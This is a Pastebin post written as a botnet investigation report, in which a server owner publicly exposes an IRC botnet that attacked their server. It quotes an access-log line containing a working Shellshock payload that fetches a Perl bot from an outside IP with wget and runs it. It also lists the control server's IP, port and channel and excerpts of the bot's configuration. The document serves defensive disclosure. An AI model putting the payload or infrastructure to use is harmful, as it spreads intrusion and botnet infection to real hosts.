Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- http://pastebin.com/SPMkyZ4w - saga continues.. (:
- _____________________________________
- [```` BOTNET INVESTIGATION REPORT ````]
- `````````````````````````````````````
- Date: January 16, 2015
- Botnet type: IRC Bots/Malware
- Botnet control server IP: 64.32.12.57 (Sharktech.net)
- Protocol: IRC
- Port: 80 ( /connect 64.32.12.57 80 -j #new )
- Hacked hosts: >500
- Previous report of the same botnet: http://pastebin.com/DabxDiwm , http://pastebin.com/SPMkyZ4w
- Bot url: http://74.208.166.12/bot.txt (mirror: http://pastebin.com/Zbkke58A)
- (u17173405.onlinehome-server.com Numerical: 74.208.166.12)
- Access log:
- 217.114.212.26 - - [16/Jan/2015:15:46:35 -0500] "GET /phppath/cgi_wrapper HTTP/1.0" 404 162 "-" "() { :;};/usr/bin/perl -e 'print \x22Content-Type: text/plain\x5Cr\x5Cn\x5Cr\x5CnXSUCCESSX\x22;system(\x22wget http://74.208.166.12/bot.txt -O /tmp/bot.pl;perl /tmp/bot.pl;rm -rf /tmp/bot.pl\x22);'"
- We can clearly see that this is a shell-shock exploitation try and the source code is here:
- http://74.208.166.12/bot.txt ( MIRROR: http://pastebin.com/Zbkke58A )
- From the source code we can clearly see that this is an IRC bot that connects to a following server:
- $servidor='64.32.12.57' unless $servidor;
- my $porta='80';
- my @canais=("#new");
- my @adms=("X","Y");
- my @auth=("*!*@evil");
- Hey, whoever you are, it's a third time I reporting you to the public, maybe you'll stop attacking my server? I see you are enjoying everyone using your botnet :-) Good luck.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement